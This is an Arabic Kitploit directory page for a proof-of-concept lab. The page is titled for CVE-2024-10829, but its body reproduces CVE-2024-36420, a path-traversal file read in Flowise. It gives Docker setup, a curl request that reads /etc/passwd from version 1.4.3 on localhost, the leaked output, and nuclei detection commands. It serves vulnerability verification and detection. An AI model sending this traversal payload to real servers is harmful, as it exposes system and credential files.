Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC_CVE-2024-10829 — تحليل CVE-2024-10829 | Kitploit
أدوات/GitHubGitHub/junn34/poc_cve-2024-10829
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubjunn34/poc_cve-2024-10829

POC_CVE-2024-10829

تحليل CVE-2024-10829

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

POC_CVE-2024-36420

مختبر إعادة إنتاج محلي ومسودة قالب nuclei لثغرة CVE-2024-36420 التي تؤثر على Flowise.

الملخص

CVE-2024-36420 هي ثغرة قراءة ملفات اعتباطية في Flowise ناتجة عن استخدام غير منقّى لمعامل fileName في جسم الطلب في:

  • POST /api/v1/openai-assistants-file

استُخدم هذا المختبر للتحقق من:

  • السلوك القابل للاستغلال على flowiseai/flowise:1.4.3
  • السلوك المرفوض على الإصدار الأحدث flowiseai/flowise:3.1.2

المراجع

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

الملفات

تنزيل الأداة
  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

اختبار النسخة المصابة

شغّل Flowise 1.4.3:

root@kitploit:~
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

التحقق اليدوي:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

الاستجابة المرصودة على النسخة القابلة للاستغلال:

root@kitploit:~
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

اختبار النسخة الأحدث

شغّل إصدار Flowise الأحدث 3.1.2:

root@kitploit:~
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

التحقق اليدوي:

root@kitploit:~
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

الاستجابة المرصودة على الإصدار الأحدث:

root@kitploit:~
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

تحقق من صحة القالب:

root@kitploit:~
nuclei -duc -validate -t CVE-2024-36420.yaml

تشغيله ضد الهدف القابل للاستغلال:

root@kitploit:~
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

السلوك المتوقع:

  • 1.4.3: تطابق
  • 3.1.2: لا تطابق

ملاحظات

  • الفجوة بين الإصدارين مقبولة لأن هذا المستودع يذكر فقط السلوك المرصود:
    • قابل للاستغلال على 1.4.3
    • مرفوض على 3.1.2
  • لا يدّعي تحديد الحدود الدقيقة للإصدار الذي تم فيه التصحيح.
  • لم تُستخدم أي أهداف من العالم الحقيقي.